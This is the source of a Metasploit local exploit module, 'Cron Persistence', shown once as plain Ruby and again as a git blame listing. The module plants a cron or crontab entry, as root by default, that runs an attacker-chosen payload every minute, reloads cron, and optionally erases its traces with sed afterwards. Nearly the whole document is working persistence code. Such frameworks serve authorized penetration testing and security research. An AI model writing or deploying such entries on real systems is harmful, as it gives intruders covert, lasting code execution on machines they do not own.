metasploit-framework/modules/exploits/linux/local/cron_persistence.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Unix
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Cron Persistence',
        'Description'    => %q(
          This module will create a cron or crontab entry to execute a payload.
          The module includes the ability to automatically clean up those entries to prevent multiple executions.
          syslog will get a copy of the cron entry.
        ),
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'h00die <mike@shorebreaksecurity.com>'
          ],
        'Platform'       => ['unix', 'linux'],
        'Targets'        =>
          [
            [ 'Cron',           { :path => '/etc/cron.d' } ],
            [ 'User Crontab',   { :path => '/var/spool/cron' } ],
            [ 'System Crontab', { :path => '/etc' } ]
          ],
        'DefaultTarget'  => 1,
        'Arch'           => ARCH_CMD,
        'Payload'        =>
        {
          'BadChars'   => "#%\x10\x13", # is for comments, % is for newline
          'Compat'     =>
          {
            'PayloadType'  => 'cmd',
            'RequiredCmd'  => 'generic perl ruby python'
          }
        },
        'DefaultOptions' => { 'WfsDelay' => 90 },
        'DisclosureDate' => "Jul 1 1979" # Version 7 Unix release date (first cron implementation)
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [false, 'User to run cron/crontab as', 'root']),
        OptString.new('TIMING', [false, 'cron timing.  Changing will require WfsDelay to be adjusted', '* * * * *']),
        OptBool.new('CLEANUP', [true, 'delete cron entry after execution', true])
      ], self.class
    )
  end

  def exploit
    # https://gist.github.com/istvanp/310203 for cron regex validator
    cron_regex = '(\*|[0-5]?[0-9]|\*\/[0-9]+)\s+'
    cron_regex << '(\*|1?[0-9]|2[0-3]|\*\/[0-9]+)\s+'
    cron_regex << '(\*|[1-2]?[0-9]|3[0-1]|\*\/[0-9]+)\s+'
    cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
    cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
    # cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
    unless datastore['TIMING'] =~ /#{cron_regex}/
      fail_with(Failure::BadConfig, 'Invalid timing format')
    end
    cron_entry = datastore['TIMING']
    if target.name.include? 'User Crontab'
      unless user_cron_permission?(datastore['USERNAME'])
        fail_with(Failure::NoAccess, 'User denied cron via cron.deny')
      end
    else
      cron_entry += " #{datastore['USERNAME']}"
    end
    flag = Rex::Text.rand_text_alpha(10)
    cron_entry += " #{payload.encoded} ##{flag}" # we add a flag to the end of the entry to potentially delete it later
    case target.name
    when 'Cron'
      our_entry = Rex::Text.rand_text_alpha(10)
      write_file("#{target.opts[:path]}/#{our_entry}", "#{cron_entry}\n")
      vprint_good("Writing #{cron_entry} to #{target.opts[:path]}/#{our_entry}")
      if datastore['CLEANUP']
        register_file_for_cleanup("#{target.opts[:path]}/#{our_entry}")
      end
    when 'System Crontab'
      file_to_clean = "#{target.opts[:path]}/crontab"
      append_file(file_to_clean, "\n#{cron_entry}\n")
      vprint_good("Writing #{cron_entry} to #{file_to_clean}")
    when 'User Crontab'
      file_to_clean = "#{target.opts[:path]}/crontabs/#{datastore['USERNAME']}"
      append_file(file_to_clean, "\n#{cron_entry}\n")
      vprint_good("Writing #{cron_entry} to #{file_to_clean}")
      # at least on ubuntu, we need to reload cron to get this to work
      vprint_status('Reloading cron to pickup new entry')
      cmd_exec("service cron reload")
    end
    print_status("Waiting #{datastore['WfsDelay']}sec for execution")
    Rex.sleep(datastore['WfsDelay'].to_i)
    # we may need to do some cleanup, no need for cron since that uses file dropper
    # we could run this on a on_successful_session, but we want cleanup even if it fails
    if file_to_clean && flag && datastore['CLEANUP']
      print_status("Removing our cron entry from #{file_to_clean}")
      cmd_exec("sed '/#{flag}$/d' #{file_to_clean} > #{file_to_clean}.new")
      cmd_exec("mv #{file_to_clean}.new #{file_to_clean}")
      # replaced cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}") in favor of sed
      if target.name == 'User Crontab' # make sure we clean out of memory
        cmd_exec("service cron reload")
      end
    end
  end

  def user_cron_permission?(user)
    # double check we're allowed to do cron
    # may also be /etc/cron.d/
    paths = ['/etc/', '/etc/cron.d/']
    paths.each do |path|
      cron_auth = read_file("#{path}cron.allow")
      if cron_auth
        if cron_auth =~ /^ALL$/ || cron_auth =~ /^#{Regexp.escape(user)}$/
          vprint_good("User located in #{path}cron.allow")
          return true
        end
      end
      cron_auths = read_file("#{path}cron.deny")
      if cron_auths && cron_auth =~ /^#{Regexp.escape(user)}$/
        vprint_error("User located in #{path}cron.deny")
        return false
      end
    end
    # no guidance, so we should be fine
    true
  end
end
cron persistence 2016-06-21 01:45:04 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
cron persistence 2016-06-21 01:45:04 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Local`
			`Rank = ExcellentRanking`

			`include Msf::Post::File`
			`include Msf::Post::Unix`
			`include Msf::Exploit::FileDropper`

			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Cron Persistence',`
			`'Description' => %q(`
			`This module will create a cron or crontab entry to execute a payload.`
			`The module includes the ability to automatically clean up those entries to prevent multiple executions.`
			`syslog will get a copy of the cron entry.`
			`),`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'h00die <mike@shorebreaksecurity.com>'`
			`],`
			`'Platform' => ['unix', 'linux'],`
			`'Targets' =>`
			`[`
fixes round 2 2016-07-15 12:44:39 +00:00			`[ 'Cron', { :path => '/etc/cron.d' } ],`
			`[ 'User Crontab', { :path => '/var/spool/cron' } ],`
			`[ 'System Crontab', { :path => '/etc' } ]`
cron persistence 2016-06-21 01:45:04 +00:00			`],`
			`'DefaultTarget' => 1,`
			`'Arch' => ARCH_CMD,`
			`'Payload' =>`
			`{`
fixes round 2 2016-07-15 12:44:39 +00:00			`'BadChars' => "#%\x10\x13", # is for comments, % is for newline`
cron persistence 2016-06-21 01:45:04 +00:00			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic perl ruby python'`
			`}`
			`},`
			`'DefaultOptions' => { 'WfsDelay' => 90 },`
			`'DisclosureDate' => "Jul 1 1979" # Version 7 Unix release date (first cron implementation)`
			`)`
			`)`

			`register_options(`
			`[`
slight issues found by void-in 2016-06-21 09:12:10 +00:00			`OptString.new('USERNAME', [false, 'User to run cron/crontab as', 'root']),`
			`OptString.new('TIMING', [false, 'cron timing. Changing will require WfsDelay to be adjusted', '* * * * *']),`
			`OptBool.new('CLEANUP', [true, 'delete cron entry after execution', true])`
cron persistence 2016-06-21 01:45:04 +00:00			`], self.class`
			`)`
			`end`

			`def exploit`
			`# https://gist.github.com/istvanp/310203 for cron regex validator`
			`cron_regex = '(\\|[0-5]?[0-9]\|\\/[0-9]+)\s+'`
			`cron_regex << '(\\|1?[0-9]\|2[0-3]\|\\/[0-9]+)\s+'`
			`cron_regex << '(\\|[1-2]?[0-9]\|3[0-1]\|\\/[0-9]+)\s+'`
			`cron_regex << '(\\|[0-9]\|1[0-2]\|\\/[0-9]+\|jan\|feb\|mar\|apr\|may\|jun\|jul\|aug\|sep\|oct\|nov\|dec)\s+'`
			`cron_regex << '(\\/[0-9]+\|\\|[0-7]\|sun\|mon\|tue\|wed\|thu\|fri\|sat)' # \s*`
			`# cron_regex << '(\\/[0-9]+\|\\|[0-9]+)?'`
fixes round 2 2016-07-15 12:44:39 +00:00			`unless datastore['TIMING'] =~ /#{cron_regex}/`
cron persistence 2016-06-21 01:45:04 +00:00			`fail_with(Failure::BadConfig, 'Invalid timing format')`
			`end`
slight issues found by void-in 2016-06-21 09:12:10 +00:00			`cron_entry = datastore['TIMING']`
fixes round 2 2016-07-15 12:44:39 +00:00			`if target.name.include? 'User Crontab'`
slight issues found by void-in 2016-06-21 09:12:10 +00:00			`unless user_cron_permission?(datastore['USERNAME'])`
cron persistence 2016-06-21 01:45:04 +00:00			`fail_with(Failure::NoAccess, 'User denied cron via cron.deny')`
			`end`
			`else`
slight issues found by void-in 2016-06-21 09:12:10 +00:00			`cron_entry += " #{datastore['USERNAME']}"`
cron persistence 2016-06-21 01:45:04 +00:00			`end`
			`flag = Rex::Text.rand_text_alpha(10)`
			`cron_entry += " #{payload.encoded} ##{flag}" # we add a flag to the end of the entry to potentially delete it later`
			`case target.name`
			`when 'Cron'`
			`our_entry = Rex::Text.rand_text_alpha(10)`
fixes round 2 2016-07-15 12:44:39 +00:00			`write_file("#{target.opts[:path]}/#{our_entry}", "#{cron_entry}\n")`
			`vprint_good("Writing #{cron_entry} to #{target.opts[:path]}/#{our_entry}")`
slight issues found by void-in 2016-06-21 09:12:10 +00:00			`if datastore['CLEANUP']`
fixes round 2 2016-07-15 12:44:39 +00:00			`register_file_for_cleanup("#{target.opts[:path]}/#{our_entry}")`
cron persistence 2016-06-21 01:45:04 +00:00			`end`
			`when 'System Crontab'`
fixes round 2 2016-07-15 12:44:39 +00:00			`file_to_clean = "#{target.opts[:path]}/crontab"`
append over read and write 2016-06-21 20:56:34 +00:00			`append_file(file_to_clean, "\n#{cron_entry}\n")`
cron persistence 2016-06-21 01:45:04 +00:00			`vprint_good("Writing #{cron_entry} to #{file_to_clean}")`
			`when 'User Crontab'`
fixes round 2 2016-07-15 12:44:39 +00:00			`file_to_clean = "#{target.opts[:path]}/crontabs/#{datastore['USERNAME']}"`
append over read and write 2016-06-21 20:56:34 +00:00			`append_file(file_to_clean, "\n#{cron_entry}\n")`
cron persistence 2016-06-21 01:45:04 +00:00			`vprint_good("Writing #{cron_entry} to #{file_to_clean}")`
fixes round 2 2016-07-15 12:44:39 +00:00			`# at least on ubuntu, we need to reload cron to get this to work`
cron persistence 2016-06-21 01:45:04 +00:00			`vprint_status('Reloading cron to pickup new entry')`
fixes round 2 2016-07-15 12:44:39 +00:00			`cmd_exec("service cron reload")`
cron persistence 2016-06-21 01:45:04 +00:00			`end`
			`print_status("Waiting #{datastore['WfsDelay']}sec for execution")`
fixes round 2 2016-07-15 12:44:39 +00:00			`Rex.sleep(datastore['WfsDelay'].to_i)`
cron persistence 2016-06-21 01:45:04 +00:00			`# we may need to do some cleanup, no need for cron since that uses file dropper`
			`# we could run this on a on_successful_session, but we want cleanup even if it fails`
slight issues found by void-in 2016-06-21 09:12:10 +00:00			`if file_to_clean && flag && datastore['CLEANUP']`
cron persistence 2016-06-21 01:45:04 +00:00			`print_status("Removing our cron entry from #{file_to_clean}")`
fixes round 2 2016-07-15 12:44:39 +00:00			`cmd_exec("sed '/#{flag}$/d' #{file_to_clean} > #{file_to_clean}.new")`
			`cmd_exec("mv #{file_to_clean}.new #{file_to_clean}")`
			`# replaced cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}") in favor of sed`
cron persistence 2016-06-21 01:45:04 +00:00			`if target.name == 'User Crontab' # make sure we clean out of memory`
fixes round 2 2016-07-15 12:44:39 +00:00			`cmd_exec("service cron reload")`
cron persistence 2016-06-21 01:45:04 +00:00			`end`
			`end`
			`end`

			`def user_cron_permission?(user)`
			`# double check we're allowed to do cron`
			`# may also be /etc/cron.d/`
slight issues found by void-in 2016-06-21 09:12:10 +00:00			`paths = ['/etc/', '/etc/cron.d/']`
cron persistence 2016-06-21 01:45:04 +00:00			`paths.each do \|path\|`
			`cron_auth = read_file("#{path}cron.allow")`
			`if cron_auth`
			`if cron_auth =~ /^ALL$/ \|\| cron_auth =~ /^#{Regexp.escape(user)}$/`
			`vprint_good("User located in #{path}cron.allow")`
			`return true`
			`end`
			`end`
			`cron_auths = read_file("#{path}cron.deny")`
			`if cron_auths && cron_auth =~ /^#{Regexp.escape(user)}$/`
			`vprint_error("User located in #{path}cron.deny")`
			`return false`
			`end`
			`end`
			`# no guidance, so we should be fine`
			`true`
			`end`
			`end`